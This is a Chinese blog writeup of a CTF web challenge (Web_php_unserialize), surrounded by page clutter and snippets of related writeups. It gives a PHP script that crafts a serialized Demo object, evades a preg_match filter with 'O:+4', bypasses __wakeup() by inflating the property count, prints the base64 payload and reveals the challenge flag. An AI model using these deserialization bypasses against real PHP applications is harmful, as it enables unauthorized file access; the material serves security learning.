攻防世界 web部分的Web_php_unserialize的writeup

最新推荐文章于 2025-01-24 15:39:01 发布

原创最新推荐文章于 2025-01-24 15:39:01 发布 · 1.5k 阅读

2 ·

CC 4.0 BY-SA版权

CTF 同时被 2 个专栏收录

20 篇文章

订阅专栏

web

1 篇文章

订阅专栏

这个题就是三个点：

1、$file改成fl4g.php；

2、绕过：preg_match('/[oc]:\d+:/i', $var)

3、跳过__wakeup()。

步骤如下：

<?php 
class Demo { 
    private $file = 'fl4g.php';//$file改成fl4g.php
}

$a= serialize(new demo);
$a= str_replace('O:4', 'O:+4',$a);//绕过preg_match
$a= str_replace(':1:', ':2:',$a);//绕过wakeup
echo base64_encode($a);
?>

代码执行得：

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

执行即可：

flag即为：

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

隐藏起来

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

攻防世界进阶篇– Web_php_unserialize – WriteUp

giaogiao123的博客

02-17

1929

先是一串代码审计看的出来要get一个var=? ？里要满足3个条件 1要绕过wake up 函数 2要绕过正则表达式 3必须是base64加密首先有关 PHP 其它魔术方法的内容可以参考 PHP 官方文档有关 PHP 反序列化漏洞的内容可以参考 PHP 反序列化漏洞那么开始正解题目 wake up这个函数大家都了解过那么我们先序列化这个var 而正则匹配的规则是: 在不区分大...

攻防世界-Web-Web_php_unserialize

2301_80797059的博客

10-02

285

1.php反序列化2.正则匹配。

1 条评论您还未登录，请先登录后发表或查看评论

1 条评论

hahahahahahahahahei 2020.09.09
你好，我想问一下正则绕过那里，为什么只能用‘+’来绕过呢？

Web – Web_php_unserialize – WriteUp【序列化与反序列化】

我的博客

08-19

549

刚才做了一道 PHP 反序列化的题目，题目虽简单但考察的点挺经典的，这里转载一个帖子总结记录一下题目题目是这样的很明显是一道 PHP 反序列化的题目，直接来看题目给出的流程首先判断当前是否存在 GET 参数 " var " ，若存在则对其进行 Base64 解码后存入 $var 变量 . 若不存在则输出当前页面源码对 $var 进行一个正则过滤，若通过正则过滤，则对其进行反序列化操作，否则响应提示信息 . 题目中给出一个 Demo 类，需

关于正则匹配preg_match(‘/^O:\d+/‘)的绕过的几种方法

m0_63138919的博客

10-13

2835

本文为preg_match('/^O:d+/')正则匹配绕过的方法

php反序列化姿势学习

彼岸花苏陌的博客

01-16

2843

php反序列化姿势学习1.__wakeup()函数绕过2./[oc]:\d+:/i研究欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1.__wakeup()函数绕过 wakeup函数作为ph

两道反序列化例题

limenzzz的博客

05-03

1376

攻防世界： 1.Web_php_unserialize 先代码审计，发现定义了demo类，而在其中有一句这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中，于是需要构造反序列化的demo类，且要绕过wake_up函数，根据上篇可知，只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造，未构建任何绕过 O:4:"demo":2:{s:10:"De

【攻防世界】 Web_php_unserialize writeup

GZWZ_的博客

04-19

1469

PHP反序列化，_wakeup()绕过

攻防世界--Web_php_unserialize

weixin_51313108的博客

09-17

1043

攻防世界--Web_php_unserialize考点WP__wakeup的绕过正则表达式绕过PHP脚本和注意事项（重要）参考连接考点 __wakeup魔术方法的绕过 O:数字正则表达式的绕过 php代码编写 WP <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } fun

[CTF刷题篇]攻防世界Web进阶之unserialize3 Writeup

qq_43668710的博客

04-22

727

前言有了之前的PHP反序列化漏洞实例复现姿势详解这篇文章,突然发现自己终于不再畏惧关于反序列化的题了,刚刚遇见甚至还有一丝兴奋,终于可以验证自己这段时间的付出了! 分析访问题目中给的url; 很明显,这题就考了2个点: `反序列化` `魔术函数__wakeup()的绕过` 附:绕过__wakeup()的姿势: __wakeup 触发于 unserilize() 调用之前, 当反序列化时的字...

【攻防世界】十二 --- unserialize3 --- php反序列化

qq_43168364的博客

12-25

681

题目 — unserialize3 一、writeup 一道php反序列化的题关键点：当审出存在反序列化漏洞时，我们将对应的那个类拿出到自己的php环境中，先用恶意字符串实例化该类然后用serialize()函数，进行序列化，将序列化好的东西抛出到环境中即可造成反序列化漏洞当$flag='111’是可以看到flag，通过?code查询字符串来传入需要反序列化的字符串反序列时会自动调用__wakeup() 函数，导致程序结束执行，因此要绕过 __wakeup() 函数（绕过的方法在知识点中有介绍）

ctfshow 反序列化篇

m0_62422842的博客

07-07

3192

涉及到的题目是web254~web266

objective－c中正则表达式

12-10

oc中正则表达式的使用，主要涉及了特殊符号转义字符的处理。（［］ \ ）三个特殊符号的处理。验证了邮箱、手机、昵称、密码。

Web_php_unserialize(攻防世界）

m0_70819573的博客

02-21

494

在 PHP5 < 5.6.25， PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时，wakeup就会被绕过。2.主要有两个可绕过的点，preg_match和_wake up的绕过。（2）preg_match绕过。（1）_wake up的绕过。1.打开环境，审计代码。

攻防世界Web_php_unserialize

qq_51233573的博客

03-10

2860

最近开始刷攻防世界的web题目，遇到一个比较有意思的题目。ctf小白大家勿喷访问题目链接是一段php代码对代码进行初步审计发现unserialize函数可以确定是一个php反序列化的利用由于刚开始学习php的反序列化对php不是特别熟悉所以对代码进行逐行解析 <?php class Demo { private $file = 'index.php'; //设置了类的私有变量 public function __construc...

攻防世界 Web_php_unserialize

Bulestardemon的博客

01-24

747

【代码】攻防世界 Web_php_unserialize。

Web_php_unserialize

怪味巧克力的博客

05-25

3476

前言：看到好的知识点就喜欢记录下来，一是为了方便自己以后复习，二是也能帮助大家了解知识点知识点： 1、__construct()：当对象创建（new）时会自动调用。但在 unserialize() 时是不会自动调用的。（构造函数） 2、__destruct()：当对象被销毁时会自动调用。（析构函数） 3、__wakeup()：unserialize() 时会自动调用。首先拿到题目看到给出一段PHP源码 <?php class Demo { private $file = 'inde

安恒月赛WriteUp-2018.12

BlusKing

12-22

3109

安恒月赛WriteUp2018-12月 WEB1-easy： web1反序列化一打开就显示了源代码： <?php @error_reporting(1); include 'flag.php'; class baby { public $file; function __toString() { ...

攻防世界-Web_php_unserialize

fresh_fistpupiu的博客

02-02

462

构造完毕得到相应的payload：TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==//将对象的属性个数改为大于实际数，substr_replace(字符串，要替换进去的字符，开始位置，替换的字符数目)。如：http://url/index.php/?以GET方式，将payload放在var变量中注入。//在O:4:的4前加个‘+’，绕过字符串检测。//base64编码。

攻防世界-Web-Exercise-Wirteup

08-08

457

攻防世界Web题进阶区题目部分记录。前面题型比较基础，仅记录较为典型的题目用于以后知识点的回顾。目录 Web_php_unserialize Web_php_unserialize 题目描述： <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function _

攻防世界WEB新手模式Web_php_unserialize

最新发布

11-28

### 解题思路在Web_php_unserialize题目中，题目的代码会对传入的反序列化字符串进行一些检查和处理 [^2]。代码首先定义了一个名为Demo的类，包含私有变量$file和__construct()、__destruct()、__wakeup()三个魔术方法。__wakeup()方法会检查$file变量，若不等于index.php则将其重置为index.php，以此防止攻击者读取fl4g.php文件内容 [^2]。当用户通过GET方式传入var参数时，代码会对其进行base64解码，接着使用正则表达式`/[oc]:\d+:/i`检查解码后的字符串，若匹配则阻止攻击，若不匹配则进行反序列化操作 [^2]。为了解题，可构造一个Demo类的对象并序列化，然后对序列化字符串进行修改。将`O:4`替换为`O:+4`，` :1:`替换为` :2:`，绕过__wakeup()方法的检查，再对修改后的字符串进行base64编码，最后将编码后的字符串作为var参数的值传入URL，从而读取fl4g.php文件内容 [^2][^3]。 ### 相关知识点 - **序列化与反序列化**：序列化是将对象的状态信息转换为可以存储或传输的形式的过程，反序列化则是将序列化的数据恢复为对象的过程。在PHP中，使用`serialize()`函数进行序列化，使用`unserialize()`函数进行反序列化 [^1][^2][^3][^4]。 - **魔术方法**： - `__construct()`：在创建对象时自动调用，用于初始化对象的属性 [^2]。 - `__destruct()`：在对象被销毁或脚本结束时自动调用，可用于执行一些清理操作，如关闭文件、释放资源等 [^2][^4]。 - `__wakeup()`：在反序列化时自动调用，可用于对对象的属性进行一些初始化或检查操作 [^1][^2][^4]。 - **正则表达式匹配**：使用`preg_match()`函数执行正则表达式匹配，可用于检查字符串是否符合特定的模式。在本题中，使用正则表达式`/[oc]:\d+:/i`检查反序列化字符串是否包含特定模式，若匹配则阻止攻击 [^2]。 - **字符串替换**：使用`str_replace()`函数进行字符串替换操作，可用于修改序列化字符串，绕过__wakeup()方法的检查 [^3]。 - **Base64编码与解码**：使用`base64_encode()`函数对字符串进行Base64编码，使用`base64_decode()`函数对Base64编码的字符串进行解码 [^2][^3][^4]。 ### 示例代码 ```php <?php class Demo { private $file = 'fl4g.php'; } $a = new Demo(); $b = serialize($a); echo $b; $b = str_replace('O:4', 'O:+4', $b); $b = str_replace(':1:', ':2:', $b); $b = base64_encode($b); echo $b; ?> ```